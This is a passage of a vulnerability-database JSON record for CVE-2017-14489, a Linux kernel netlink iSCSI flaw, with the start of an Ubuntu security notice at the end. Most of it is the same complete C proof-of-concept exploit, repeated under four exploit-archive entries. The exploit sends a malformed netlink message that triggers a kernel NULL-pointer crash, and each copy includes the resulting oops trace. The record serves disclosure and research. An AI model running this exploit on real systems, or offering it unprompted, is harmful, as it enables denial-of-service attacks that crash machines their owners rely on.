NETLINK_ISCSI);\r\nif(sock_fd<0)\r\nreturn -1;\r\n\r\nmemset(&src_addr, 0, sizeof(src_addr));\r\nsrc_addr.nl_family = AF_NETLINK;\r\nsrc_addr.nl_pid = getpid(); /* self pid */\r\n\r\nbind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));\r\n\r\nmemset(&dest_addr, 0, sizeof(dest_addr));\r\nmemset(&dest_addr, 0, sizeof(dest_addr));\r\ndest_addr.nl_family = AF_NETLINK;\r\ndest_addr.nl_pid = 0; /* For Linux Kernel */\r\ndest_addr.nl_groups = 0; /* unicast */\r\n\r\nnlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));\r\nmemset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));\r\nnlh->nlmsg_len = 0xac;\r\nnlh->nlmsg_pid = getpid();\r\nnlh->nlmsg_flags = 0;\r\n\r\nstrcpy(NLMSG_DATA(nlh), \"ABCDEFGHabcdefghABCDEFGHabcdef\r\nghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab\r\ncdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\\x10\");\r\n\r\niov.iov_base = (void *)nlh;\r\niov.iov_len = 0xc0;\r\nmsg.msg_name = (void *)&dest_addr;\r\nmsg.msg_namelen = sizeof(dest_addr);\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\n\r\nprintf(\"Sending message to kernel\\n\");\r\nsendmsg(sock_fd,&msg,0);\r\nprintf(\"Waiting for message from kernel\\n\");\r\n\r\n/* Read message from kernel */\r\nrecvmsg(sock_fd, &msg, 0);\r\nprintf(\"Received message payload: %s\\n\", (char *)NLMSG_DATA(nlh));\r\nclose(sock_fd);\r\n}\r\n\r\n\r\nCrash info:\r\n[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at\r\n0000000000000028\r\n[ 17.881586] IP: skb_release_data+0x77/0x110\r\n[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0\r\n[ 17.882743] Oops: 0002 [#1] SMP\r\n[ 17.883123] Modules linked in:\r\n[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1\r\n[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\r\nUbuntu-1.8.2-1ubuntu1 04/01/2014\r\n[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000\r\n[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110\r\n[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202\r\n[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:\r\nffffffff820f96a0\r\n[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:\r\n000000000000000c\r\n[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:\r\nffffc90000e13ad8\r\n[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:\r\n0000000000000000\r\n[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:\r\n0000000000000000\r\n[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)\r\nknlGS:0000000000000000\r\n[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:\r\n00000000000006e0\r\n[ 17.892629] Call Trace:\r\n[ 17.892833] skb_release_all+0x1f/0x30\r\n[ 17.893140] consume_skb+0x27/0x90\r\n[ 17.893418] netlink_unicast+0x16a/0x210\r\n[ 17.893735] netlink_sendmsg+0x2a3/0x390\r\n[ 17.894050] sock_sendmsg+0x33/0x40\r\n[ 17.894336] ___sys_sendmsg+0x29e/0x2b0\r\n[ 17.894650] ? __wake_up_common_lock+0x7a/0x90\r\n[ 17.895009] ? __wake_up+0xe/0x10\r\n[ 17.895280] ? tty_write_unlock+0x2c/0x30\r\n[ 17.895606] ? tty_ldisc_deref+0x11/0x20\r\n[ 17.895925] ? n_tty_open+0xd0/0xd0\r\n[ 17.896211] ? __vfs_write+0x23/0x130\r\n[ 17.896512] __sys_sendmsg+0x40/0x70\r\n[ 17.896805] ? __sys_sendmsg+0x40/0x70\r\n[ 17.897133] SyS_sendmsg+0xd/0x20\r\n[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94\r\n[ 17.897783] RIP: 0033:0x7f7614886320\r\n[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:\r\n000000000000002e\r\n[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:\r\n00007f7614886320\r\n[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:\r\n0000000000000003\r\n[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:\r\n0000000000000000\r\n[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:\r\n0000000000400b9e\r\n[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:\r\n0000000000400b9e\r\n[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83\r\nc0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa\r\n<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49\r\n[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08\r\n[ 17.903689] CR2: 0000000000000028\r\n[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---\r\n\r\n\r\nReference:\r\n[1] https://patchwork.kernel.org/patch/9923803/\r\n[2] https://github.com/google/syzkaller\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/28714"}], "exploitdb": [{"lastseen": "2017-10-02T09:53:33", "description": "Linux Kernel < 4.14.rc3 - Local Denial of Service. CVE-2017-14489. Dos exploit for Linux platform", "published": "2017-10-02T00:00:00", "type": "exploitdb", "title": "Linux Kernel < 4.14.rc3 - Local Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14489"], "modified": "2017-10-02T00:00:00", "id": "EDB-ID:42932", "href": "https://www.exploit-db.com/exploits/42932/", "sourceData": "# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service\r\n# Date: 2017-Oct-02\r\n# Exploit Author: Wang Chenyu (Nanyang Technological University)\r\n# Version:Linux kernel 4-14-rc1\r\n# Tested on:Ubuntu 16.04 desktop amd64\r\n# CVE : CVE-2017-14489\r\n# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and\r\ndiscovered by Syzkaller. Provided for legal security research and testing\r\npurposes ONLY.\r\nIn this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err\r\n(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >\r\nnlh->nlmsg_len.\r\n\r\n\r\nPOC:\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n\r\n#define NETLINK_USER 31\r\n\r\n#define MAX_PAYLOAD 1024 /* maximum payload size*/\r\nstruct sockaddr_nl src_addr, dest_addr;\r\nstruct nlmsghdr *nlh = NULL;\r\nstruct iovec iov;\r\nint sock_fd;\r\nstruct msghdr msg;\r\n\r\nint main()\r\n{\r\nsock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);\r\nif(sock_fd<0)\r\nreturn -1;\r\n\r\nmemset(&src_addr, 0, sizeof(src_addr));\r\nsrc_addr.nl_family = AF_NETLINK;\r\nsrc_addr.nl_pid = getpid(); /* self pid */\r\n\r\nbind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));\r\n\r\nmemset(&dest_addr, 0, sizeof(dest_addr));\r\nmemset(&dest_addr, 0, sizeof(dest_addr));\r\ndest_addr.nl_family = AF_NETLINK;\r\ndest_addr.nl_pid = 0; /* For Linux Kernel */\r\ndest_addr.nl_groups = 0; /* unicast */\r\n\r\nnlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));\r\nmemset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));\r\nnlh->nlmsg_len = 0xac;\r\nnlh->nlmsg_pid = getpid();\r\nnlh->nlmsg_flags = 0;\r\n\r\nstrcpy(NLMSG_DATA(nlh), \"ABCDEFGHabcdefghABCDEFGHabcdef\r\nghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab\r\ncdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\\x10\");\r\n\r\niov.iov_base = (void *)nlh;\r\niov.iov_len = 0xc0;\r\nmsg.msg_name = (void *)&dest_addr;\r\nmsg.msg_namelen = sizeof(dest_addr);\r\nmsg.msg_iov = &iov;\r\nmsg.msg_iovlen = 1;\r\n\r\nprintf(\"Sending message to kernel\\n\");\r\nsendmsg(sock_fd,&msg,0);\r\nprintf(\"Waiting for message from kernel\\n\");\r\n\r\n/* Read message from kernel */\r\nrecvmsg(sock_fd, &msg, 0);\r\nprintf(\"Received message payload: %s\\n\", (char *)NLMSG_DATA(nlh));\r\nclose(sock_fd);\r\n}\r\n\r\n\r\nCrash info:\r\n[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at\r\n0000000000000028\r\n[ 17.881586] IP: skb_release_data+0x77/0x110\r\n[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0\r\n[ 17.882743] Oops: 0002 [#1] SMP\r\n[ 17.883123] Modules linked in:\r\n[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1\r\n[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\r\nUbuntu-1.8.2-1ubuntu1 04/01/2014\r\n[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000\r\n[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110\r\n[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202\r\n[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:\r\nffffffff820f96a0\r\n[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:\r\n000000000000000c\r\n[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:\r\nffffc90000e13ad8\r\n[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:\r\n0000000000000000\r\n[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:\r\n0000000000000000\r\n[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)\r\nknlGS:0000000000000000\r\n[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:\r\n00000000000006e0\r\n[ 17.892629] Call Trace:\r\n[ 17.892833] skb_release_all+0x1f/0x30\r\n[ 17.893140] consume_skb+0x27/0x90\r\n[ 17.893418] netlink_unicast+0x16a/0x210\r\n[ 17.893735] netlink_sendmsg+0x2a3/0x390\r\n[ 17.894050] sock_sendmsg+0x33/0x40\r\n[ 17.894336] ___sys_sendmsg+0x29e/0x2b0\r\n[ 17.894650] ? __wake_up_common_lock+0x7a/0x90\r\n[ 17.895009] ? __wake_up+0xe/0x10\r\n[ 17.895280] ? tty_write_unlock+0x2c/0x30\r\n[ 17.895606] ? tty_ldisc_deref+0x11/0x20\r\n[ 17.895925] ? n_tty_open+0xd0/0xd0\r\n[ 17.896211] ? __vfs_write+0x23/0x130\r\n[ 17.896512] __sys_sendmsg+0x40/0x70\r\n[ 17.896805] ? __sys_sendmsg+0x40/0x70\r\n[ 17.897133] SyS_sendmsg+0xd/0x20\r\n[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94\r\n[ 17.897783] RIP: 0033:0x7f7614886320\r\n[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:\r\n000000000000002e\r\n[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:\r\n00007f7614886320\r\n[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:\r\n0000000000000003\r\n[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:\r\n0000000000000000\r\n[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:\r\n0000000000400b9e\r\n[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:\r\n0000000000400b9e\r\n[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83\r\nc0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa\r\n<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49\r\n[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08\r\n[ 17.903689] CR2: 0000000000000028\r\n[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---\r\n\r\n\r\nReference:\r\n[1] https://patchwork.kernel.org/patch/9923803/\r\n[2] https://github.com/google/syzkaller\r\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/42932/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:26", "description": "\nLinux Kernel 4.14.rc3 - Local Denial of Service", "edition": 1, "published": "2017-10-02T00:00:00", "title": "Linux Kernel 4.14.rc3 - Local Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14489"], "modified": "2017-10-02T00:00:00", "id": "EXPLOITPACK:07DF51A414A141989EF9F5989CC324A1", "href": "", "sourceData": "/*\n# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service\n# Date: 2017-Oct-02\n# Exploit Author: Wang Chenyu (Nanyang Technological University)\n# Version:Linux kernel 4-14-rc1\n# Tested on:Ubuntu 16.04 desktop amd64\n# CVE : CVE-2017-14489\n# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and\ndiscovered by Syzkaller. Provided for legal security research and testing\npurposes ONLY.\nIn this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err\n(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >\nnlh->nlmsg_len.\n\n\nPOC:\n*/\n\n#include <sys/socket.h>\n#include <linux/netlink.h>\n#include <stdlib.h>\n#include <string.h>\n#include <stdio.h>\n\n#define NETLINK_USER 31\n\n#define MAX_PAYLOAD 1024 /* maximum payload size*/\nstruct sockaddr_nl src_addr, dest_addr;\nstruct nlmsghdr *nlh = NULL;\nstruct iovec iov;\nint sock_fd;\nstruct msghdr msg;\n\nint main()\n{\nsock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);\nif(sock_fd<0)\nreturn -1;\n\nmemset(&src_addr, 0, sizeof(src_addr));\nsrc_addr.nl_family = AF_NETLINK;\nsrc_addr.nl_pid = getpid(); /* self pid */\n\nbind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));\n\nmemset(&dest_addr, 0, sizeof(dest_addr));\nmemset(&dest_addr, 0, sizeof(dest_addr));\ndest_addr.nl_family = AF_NETLINK;\ndest_addr.nl_pid = 0; /* For Linux Kernel */\ndest_addr.nl_groups = 0; /* unicast */\n\nnlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));\nmemset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));\nnlh->nlmsg_len = 0xac;\nnlh->nlmsg_pid = getpid();\nnlh->nlmsg_flags = 0;\n\nstrcpy(NLMSG_DATA(nlh), \"ABCDEFGHabcdefghABCDEFGHabcdef\nghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab\ncdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\\x10\");\n\niov.iov_base = (void *)nlh;\niov.iov_len = 0xc0;\nmsg.msg_name = (void *)&dest_addr;\nmsg.msg_namelen = sizeof(dest_addr);\nmsg.msg_iov = &iov;\nmsg.msg_iovlen = 1;\n\nprintf(\"Sending message to kernel\\n\");\nsendmsg(sock_fd,&msg,0);\nprintf(\"Waiting for message from kernel\\n\");\n\n/* Read message from kernel */\nrecvmsg(sock_fd, &msg, 0);\nprintf(\"Received message payload: %s\\n\", (char *)NLMSG_DATA(nlh));\nclose(sock_fd);\n}\n\n\nCrash info:\n[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at\n0000000000000028\n[ 17.881586] IP: skb_release_data+0x77/0x110\n[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0\n[ 17.882743] Oops: 0002 [#1] SMP\n[ 17.883123] Modules linked in:\n[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1\n[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\nUbuntu-1.8.2-1ubuntu1 04/01/2014\n[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000\n[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110\n[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202\n[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:\nffffffff820f96a0\n[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:\n000000000000000c\n[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:\nffffc90000e13ad8\n[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:\n0000000000000000\n[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:\n0000000000000000\n[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)\nknlGS:0000000000000000\n[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:\n00000000000006e0\n[ 17.892629] Call Trace:\n[ 17.892833] skb_release_all+0x1f/0x30\n[ 17.893140] consume_skb+0x27/0x90\n[ 17.893418] netlink_unicast+0x16a/0x210\n[ 17.893735] netlink_sendmsg+0x2a3/0x390\n[ 17.894050] sock_sendmsg+0x33/0x40\n[ 17.894336] ___sys_sendmsg+0x29e/0x2b0\n[ 17.894650] ? __wake_up_common_lock+0x7a/0x90\n[ 17.895009] ? __wake_up+0xe/0x10\n[ 17.895280] ? tty_write_unlock+0x2c/0x30\n[ 17.895606] ? tty_ldisc_deref+0x11/0x20\n[ 17.895925] ? n_tty_open+0xd0/0xd0\n[ 17.896211] ? __vfs_write+0x23/0x130\n[ 17.896512] __sys_sendmsg+0x40/0x70\n[ 17.896805] ? __sys_sendmsg+0x40/0x70\n[ 17.897133] SyS_sendmsg+0xd/0x20\n[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94\n[ 17.897783] RIP: 0033:0x7f7614886320\n[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:\n000000000000002e\n[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:\n00007f7614886320\n[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:\n0000000000000003\n[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:\n0000000000000000\n[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:\n0000000000400b9e\n[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:\n0000000000400b9e\n[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83\nc0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa\n<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49\n[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08\n[ 17.903689] CR2: 0000000000000028\n[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---\n\n\nReference:\n[1] https://patchwork.kernel.org/patch/9923803/\n[2] https://github.com/google/syzkaller", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "packetstorm": [{"lastseen": "2017-10-03T13:59:24", "description": "", "published": "2017-10-02T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4-14-rc1 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-14489"], "modified": "2017-10-02T00:00:00", "id": "PACKETSTORM:144476", "href": "https://packetstormsecurity.com/files/144476/Linux-Kernel-4-14-rc1-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service \n# Date: 2017-Oct-02 \n# Exploit Author: Wang Chenyu (Nanyang Technological University) \n# Version:Linux kernel 4-14-rc1 \n# Tested on:Ubuntu 16.04 desktop amd64 \n# CVE : CVE-2017-14489 \n# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and \ndiscovered by Syzkaller. Provided for legal security research and testing \npurposes ONLY. \nIn this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err \n(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len > \nnlh->nlmsg_len. \n \n \nPOC: \n#include <sys/socket.h> \n#include <linux/netlink.h> \n#include <stdlib.h> \n#include <string.h> \n#include <stdio.h> \n \n#define NETLINK_USER 31 \n \n#define MAX_PAYLOAD 1024 /* maximum payload size*/ \nstruct sockaddr_nl src_addr, dest_addr; \nstruct nlmsghdr *nlh = NULL; \nstruct iovec iov; \nint sock_fd; \nstruct msghdr msg; \n \nint main() \n{ \nsock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI); \nif(sock_fd<0) \nreturn -1; \n \nmemset(&src_addr, 0, sizeof(src_addr)); \nsrc_addr.nl_family = AF_NETLINK; \nsrc_addr.nl_pid = getpid(); /* self pid */ \n \nbind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr)); \n \nmemset(&dest_addr, 0, sizeof(dest_addr)); \nmemset(&dest_addr, 0, sizeof(dest_addr)); \ndest_addr.nl_family = AF_NETLINK; \ndest_addr.nl_pid = 0; /* For Linux Kernel */ \ndest_addr.nl_groups = 0; /* unicast */ \n \nnlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD)); \nmemset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD)); \nnlh->nlmsg_len = 0xac; \nnlh->nlmsg_pid = getpid(); \nnlh->nlmsg_flags = 0; \n \nstrcpy(NLMSG_DATA(nlh), \"ABCDEFGHabcdefghABCDEFGHabcdef \nghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab \ncdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\\x10\"); \n \niov.iov_base = (void *)nlh; \niov.iov_len = 0xc0; \nmsg.msg_name = (void *)&dest_addr; \nmsg.msg_namelen = sizeof(dest_addr); \nmsg.msg_iov = &iov; \nmsg.msg_iovlen = 1; \n \nprintf(\"Sending message to kernel\\n\"); \nsendmsg(sock_fd,&msg,0); \nprintf(\"Waiting for message from kernel\\n\"); \n \n/* Read message from kernel */ \nrecvmsg(sock_fd, &msg, 0); \nprintf(\"Received message payload: %s\\n\", (char *)NLMSG_DATA(nlh)); \nclose(sock_fd); \n} \n \n \nCrash info: \n[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at \n0000000000000028 \n[ 17.881586] IP: skb_release_data+0x77/0x110 \n[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0 \n[ 17.882743] Oops: 0002 [#1] SMP \n[ 17.883123] Modules linked in: \n[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1 \n[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \nUbuntu-1.8.2-1ubuntu1 04/01/2014 \n[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000 \n[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110 \n[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202 \n[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX: \nffffffff820f96a0 \n[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI: \n000000000000000c \n[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09: \nffffc90000e13ad8 \n[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12: \n0000000000000000 \n[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15: \n0000000000000000 \n[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000) \nknlGS:0000000000000000 \n[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 \n[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4: \n00000000000006e0 \n[ 17.892629] Call Trace: \n[ 17.892833] skb_release_all+0x1f/0x30 \n[ 17.893140] consume_skb+0x27/0x90 \n[ 17.893418] netlink_unicast+0x16a/0x210 \n[ 17.893735] netlink_sendmsg+0x2a3/0x390 \n[ 17.894050] sock_sendmsg+0x33/0x40 \n[ 17.894336] ___sys_sendmsg+0x29e/0x2b0 \n[ 17.894650] ? __wake_up_common_lock+0x7a/0x90 \n[ 17.895009] ? __wake_up+0xe/0x10 \n[ 17.895280] ? tty_write_unlock+0x2c/0x30 \n[ 17.895606] ? tty_ldisc_deref+0x11/0x20 \n[ 17.895925] ? n_tty_open+0xd0/0xd0 \n[ 17.896211] ? __vfs_write+0x23/0x130 \n[ 17.896512] __sys_sendmsg+0x40/0x70 \n[ 17.896805] ? __sys_sendmsg+0x40/0x70 \n[ 17.897133] SyS_sendmsg+0xd/0x20 \n[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94 \n[ 17.897783] RIP: 0033:0x7f7614886320 \n[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX: \n000000000000002e \n[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX: \n00007f7614886320 \n[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI: \n0000000000000003 \n[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09: \n0000000000000000 \n[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12: \n0000000000400b9e \n[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15: \n0000000000400b9e \n[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83 \nc0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa \n<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49 \n[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08 \n[ 17.903689] CR2: 0000000000000028 \n[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]--- \n \n \nReference: \n[1] https://patchwork.kernel.org/patch/9923803/ \n[2] https://github.com/google/syzkaller \n \n`\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144476/linuxkernel414rc3-dos.txt"}], "ubuntu": [{"lastseen": "2020-07-02T11:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "Anthony Perard discovered that the Xen virtual block driver did not \nproperly initialize some data structures before passing them to user space. \nA local attacker in a guest VM could use this to expose sensitive \ninformation from the host OS or other guest VMs. (CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface in \nthe Linux kernel did not properly validate attributes when handling certain \nrequests. A local attacker with the CAP_NET_ADMIN could use this to cause a \ndenial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux \nkernel in some situations did not properly prevent second level guests \nfrom reading and writing the hardware CR8 register. A local attacker \nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux kernel \ndid not properly restrict key reads on negatively instantiated keys. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs interface \nfor the QLogic 24xx+ series SCSI driver in the Linux kernel. A local \nprivileged attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux \nkernel did not properly initialize a data structure returned to user space. \nA local attacker could use this to expose sensitive information (kernel \nmemory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that the \nrealtime inode flag was settable only on filesystems on a realtime device. \nA local attacker could use this to cause a denial of service (system \ncrash). 